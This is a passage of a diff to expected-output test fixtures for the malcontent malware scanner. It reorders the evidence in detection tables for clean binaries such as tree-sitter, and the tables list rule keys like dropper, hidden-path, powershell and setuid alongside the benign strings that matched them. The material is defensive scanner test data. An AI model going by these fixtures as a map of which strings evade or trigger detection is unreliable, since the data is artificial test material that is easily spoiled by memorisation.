[env.CRASHPAD](https://github.com/search?q=env.CRASHPAD&type=code)
[env.ELECTRON](https://github.com/search?q=env.ELECTRON&type=code)
[env.FORCE](https://github.com/search?q=env.FORCE&type=code)
[env.JEST](https://github.com/search?q=env.JEST&type=code)
[env.NODE](https://github.com/search?q=env.NODE&type=code)
[env.ORIGINAL](https://github.com/search?q=env.ORIGINAL&type=code)
[env.TEAMCITY](https://github.com/search?q=env.TEAMCITY&type=code)
[env.TEMP](https://github.com/search?q=env.TEMP&type=code)
[env.TERM](https://github.com/search?q=env.TERM&type=code)
[env.TMP](https://github.com/search?q=env.TMP&type=code)
[env.TMUX](https://github.com/search?q=env.TMUX&type=code)
[env.UNDICI](https://github.com/search?q=env.UNDICI&type=code)
[env.USERPROFILE](https://github.com/search?q=env.USERPROFILE&type=code)
[env.WATCH](https://github.com/search?q=env.WATCH&type=code)
[env.XDG](https://github.com/search?q=env.XDG&type=code) | +| LOW | [os/env/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#get_env_val) | Retrieve environment variable values | [env.USERPROFILE](https://github.com/search?q=env.USERPROFILE&type=code)
[env.COLORTERM](https://github.com/search?q=env.COLORTERM&type=code)
[env.CRASHDUMP](https://github.com/search?q=env.CRASHDUMP&type=code)
[env.CRASHPAD](https://github.com/search?q=env.CRASHPAD&type=code)
[env.ELECTRON](https://github.com/search?q=env.ELECTRON&type=code)
[env.ORIGINAL](https://github.com/search?q=env.ORIGINAL&type=code)
[env.TEAMCITY](https://github.com/search?q=env.TEAMCITY&type=code)
[env.UNDICI](https://github.com/search?q=env.UNDICI&type=code)
[env.FORCE](https://github.com/search?q=env.FORCE&type=code)
[env.WATCH](https://github.com/search?q=env.WATCH&type=code)
[env.JEST](https://github.com/search?q=env.JEST&type=code)
[env.NODE](https://github.com/search?q=env.NODE&type=code)
[env.TEMP](https://github.com/search?q=env.TEMP&type=code)
[env.TERM](https://github.com/search?q=env.TERM&type=code)
[env.TMUX](https://github.com/search?q=env.TMUX&type=code)
[env.TMP](https://github.com/search?q=env.TMP&type=code)
[env.XDG](https://github.com/search?q=env.XDG&type=code) | | LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | -| LOW | [os/fd/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/read.yara#py_fd_read) | reads from a file handle | [context.read()](https://github.com/search?q=context.read%28%29&type=code)
[reader.read()](https://github.com/search?q=reader.read%28%29&type=code)
[req.read()](https://github.com/search?q=req.read%28%29&type=code)
[self.read()](https://github.com/search?q=self.read%28%29&type=code)
[socket.read()](https://github.com/search?q=socket.read%28%29&type=code)
[stream.read()](https://github.com/search?q=stream.read%28%29&type=code)
[tail.read()](https://github.com/search?q=tail.read%28%29&type=code) | +| LOW | [os/fd/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/read.yara#py_fd_read) | reads from a file handle | [context.read()](https://github.com/search?q=context.read%28%29&type=code)
[reader.read()](https://github.com/search?q=reader.read%28%29&type=code)
[socket.read()](https://github.com/search?q=socket.read%28%29&type=code)
[stream.read()](https://github.com/search?q=stream.read%28%29&type=code)
[self.read()](https://github.com/search?q=self.read%28%29&type=code)
[tail.read()](https://github.com/search?q=tail.read%28%29&type=code)
[req.read()](https://github.com/search?q=req.read%28%29&type=code) | | LOW | [os/fd/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [sendfile](https://github.com/search?q=sendfile&type=code) | -| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [_decoder.write(ret)](https://github.com/search?q=_decoder.write%28ret%29&type=code)
[_downstream.write(e)](https://github.com/search?q=_downstream.write%28e%29&type=code)
[decoder.write(data)](https://github.com/search?q=decoder.write%28data%29&type=code)
[decoder.write(readBuffer)](https://github.com/search?q=decoder.write%28readBuffer%29&type=code)
[dest.write(chunk)](https://github.com/search?q=dest.write%28chunk%29&type=code)
[h2stream.write(body)](https://github.com/search?q=h2stream.write%28body%29&type=code)
[h2stream.write(buffer)](https://github.com/search?q=h2stream.write%28buffer%29&type=code)
[h2stream.write(chunk)](https://github.com/search?q=h2stream.write%28chunk%29&type=code)
[output.write(errStack)](https://github.com/search?q=output.write%28errStack%29&type=code)
[output.write(line)](https://github.com/search?q=output.write%28line%29&type=code)
[output.write(result)](https://github.com/search?q=output.write%28result%29&type=code)
[output.write(stringToWrite)](https://github.com/search?q=output.write%28stringToWrite%29&type=code)
[pt.write(val)](https://github.com/search?q=pt.write%28val%29&type=code)
[self.write(prefix)](https://github.com/search?q=self.write%28prefix%29&type=code)
[socket.write(body)](https://github.com/search?q=socket.write%28body%29&type=code)
[socket.write(buffer)](https://github.com/search?q=socket.write%28buffer%29&type=code)
[socket.write(chunk)](https://github.com/search?q=socket.write%28chunk%29&type=code)
[stdout.write(clear)](https://github.com/search?q=stdout.write%28clear%29&type=code)
[stdout.write(s)](https://github.com/search?q=stdout.write%28s%29&type=code)
[stream.write(data)](https://github.com/search?q=stream.write%28data%29&type=code)
[stream.write(kClearScreenDown)](https://github.com/search?q=stream.write%28kClearScreenDown%29&type=code)
[stream.write(string)](https://github.com/search?q=stream.write%28string%29&type=code)
[streamWritable.write(chunk)](https://github.com/search?q=streamWritable.write%28chunk%29&type=code)
[this.write(buf)](https://github.com/search?q=this.write%28buf%29&type=code)
[this.write(data)](https://github.com/search?q=this.write%28data%29&type=code)
[this.write(response)](https://github.com/search?q=this.write%28response%29&type=code)
[writable.write(chunk)](https://github.com/search?q=writable.write%28chunk%29&type=code)
[writer.write(chunk)](https://github.com/search?q=writer.write%28chunk%29&type=code) | +| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stream.write(kClearScreenDown)](https://github.com/search?q=stream.write%28kClearScreenDown%29&type=code)
[output.write(stringToWrite)](https://github.com/search?q=output.write%28stringToWrite%29&type=code)
[streamWritable.write(chunk)](https://github.com/search?q=streamWritable.write%28chunk%29&type=code)
[decoder.write(readBuffer)](https://github.com/search?q=decoder.write%28readBuffer%29&type=code)
[h2stream.write(buffer)](https://github.com/search?q=h2stream.write%28buffer%29&type=code)
[output.write(errStack)](https://github.com/search?q=output.write%28errStack%29&type=code)
[h2stream.write(chunk)](https://github.com/search?q=h2stream.write%28chunk%29&type=code)
[writable.write(chunk)](https://github.com/search?q=writable.write%28chunk%29&type=code)
[_downstream.write(e)](https://github.com/search?q=_downstream.write%28e%29&type=code)
[h2stream.write(body)](https://github.com/search?q=h2stream.write%28body%29&type=code)
[output.write(result)](https://github.com/search?q=output.write%28result%29&type=code)
[socket.write(buffer)](https://github.com/search?q=socket.write%28buffer%29&type=code)
[stream.write(string)](https://github.com/search?q=stream.write%28string%29&type=code)
[this.write(response)](https://github.com/search?q=this.write%28response%29&type=code)
[_decoder.write(ret)](https://github.com/search?q=_decoder.write%28ret%29&type=code)
[decoder.write(data)](https://github.com/search?q=decoder.write%28data%29&type=code)
[socket.write(chunk)](https://github.com/search?q=socket.write%28chunk%29&type=code)
[stdout.write(clear)](https://github.com/search?q=stdout.write%28clear%29&type=code)
[writer.write(chunk)](https://github.com/search?q=writer.write%28chunk%29&type=code)
[output.write(line)](https://github.com/search?q=output.write%28line%29&type=code)
[self.write(prefix)](https://github.com/search?q=self.write%28prefix%29&type=code)
[socket.write(body)](https://github.com/search?q=socket.write%28body%29&type=code)
[stream.write(data)](https://github.com/search?q=stream.write%28data%29&type=code)
[dest.write(chunk)](https://github.com/search?q=dest.write%28chunk%29&type=code)
[this.write(data)](https://github.com/search?q=this.write%28data%29&type=code)
[stdout.write(s)](https://github.com/search?q=stdout.write%28s%29&type=code)
[this.write(buf)](https://github.com/search?q=this.write%28buf%29&type=code)
[pt.write(val)](https://github.com/search?q=pt.write%28val%29&type=code) | | LOW | [os/kernel/netlink](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/netlink.yara#netlink) | communicate with kernel services | [netlink](https://github.com/search?q=netlink&type=code) | | LOW | [os/kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) | | LOW | [privesc/setuid](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/setuid.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/tree-sitter.md b/tests/linux/clean/tree-sitter.md index d49287bc8..52803bbf1 100644 --- a/tests/linux/clean/tree-sitter.md +++ b/tests/linux/clean/tree-sitter.md @@ -2,26 +2,26 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| -| MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | $elf_head | +| MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | | | MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References a 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [Darwin](https://github.com/search?q=Darwin&type=code)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[https://](https://)
[macOS](https://github.com/search?q=macOS&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[Darwin](https://github.com/search?q=Darwin&type=code)
[macOS](https://github.com/search?q=macOS&type=code) | | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | | MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | -| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/clap/issues/home/linuxbrew/.cache](https://github.com/search?q=%2Fclap%2Fissues%2Fhome%2Flinuxbrew%2F.cache&type=code)
[/debug/.J](https://github.com/search?q=%2Fdebug%2F.J&type=code)
[/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/clap/issues/home/linuxbrew/.cache](https://github.com/search?q=%2Fclap%2Fissues%2Fhome%2Flinuxbrew%2F.cache&type=code)
[/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code)
[/debug/.J](https://github.com/search?q=%2Fdebug%2F.J&type=code) | | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | | MEDIUM | [exec/shell/power](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell) | runs powershell scripts | [powershell](https://github.com/search?q=powershell&type=code) | | MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/col](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fcol&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/raw](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fraw&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/str](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fstr&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/syn](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fsyn&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/vec](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fvec&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/cell](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fcell&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/esca](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fesca&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/io/b](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fio%2Fb&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/num/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fnum%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/ops/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fops%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/slic](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fslic&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/str/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fstr%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/time](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Ftime&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/mo](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fmo&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/st](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fst&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/os/fd](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fos%2Ffd&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sync/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsync%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/p](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fp&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/threa](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fthrea&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/addr2line-0.22](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Faddr2line-0.22&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/gimli-0.29.0/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fgimli-0.29.0%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/hashbrown-0.14](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fhashbrown-0.14&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/miniz_oxide-0.](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fminiz_oxide-0.&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/rustc-demangle](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Frustc-demangle&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/config/s](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fconfig%2Fs&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/generate](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fgenerate&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/src/high](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fsrc%2Fhigh&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/highlight/sr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fhighlight%2Fsr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/binding_](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fbinding_&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/././](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2F.%2F&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./ge](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fge&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./la](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fla&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./pa](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fpa&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./qu](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fqu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./st](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fst&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./su](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fsu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./tr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Ftr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/tags/src/lib](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Ftags%2Fsrc%2Flib&type=code) | | MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [Content-Type: application/javascriptContent](https://github.com/search?q=Content-Type%3A+application%2FjavascriptContent&type=code)
[Content-Type: application/wasm/tree](https://github.com/search?q=Content-Type%3A+application%2Fwasm%2Ftree&type=code)
[Content-Type: text/htmlContent](https://github.com/search?q=Content-Type%3A+text%2FhtmlContent&type=code)
[Content-TypeServerupgradeassertion failed: d](https://github.com/search?q=Content-TypeServerupgradeassertion+failed%3A+d&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [Content-TypeServerupgradeassertion failed: d](https://github.com/search?q=Content-TypeServerupgradeassertion+failed%3A+d&type=code)
[Content-Type: application/javascriptContent](https://github.com/search?q=Content-Type%3A+application%2FjavascriptContent&type=code)
[Content-Type: application/wasm/tree](https://github.com/search?q=Content-Type%3A+application%2Fwasm%2Ftree&type=code)
[Content-Type: text/htmlContent](https://github.com/search?q=Content-Type%3A+text%2FhtmlContent&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | | MEDIUM | [net/socket/pair](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/pair.yara#socket_pair) | create a pair of connected sockets | [socketpair](https://github.com/search?q=socketpair&type=code) | | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgopythonswift](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgopythonswift)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.min.css](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.min.css)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.min.js](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.min.js)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.css](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.css)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.js](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.js)
[https://code.jquery.com/jquery](https://code.jquery.com/jquery)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://docs.rs/tree](https://docs.rs/tree)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
[https://github.com/clap](https://github.com/clap)
[https://github.com/tree](https://github.com/tree)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [arm64](https://github.com/search?q=arm64&type=code)
[http://](http://)
[https://](https://)
[x86_64](https://github.com/search?q=x86_64&type=code) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgopythonswift](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgopythonswift)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.min.css](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.min.css)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.min.js](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.min.js)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.css](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.css)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.js](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.js)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
[https://code.jquery.com/jquery](https://code.jquery.com/jquery)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h)
[https://github.com/clap](https://github.com/clap)
[https://github.com/tree](https://github.com/tree)
[https://docs.rs/tree](https://docs.rs/tree) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86_64](https://github.com/search?q=x86_64&type=code)
[arm64](https://github.com/search?q=arm64&type=code) | | LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [getenv](https://github.com/search?q=getenv&type=code)
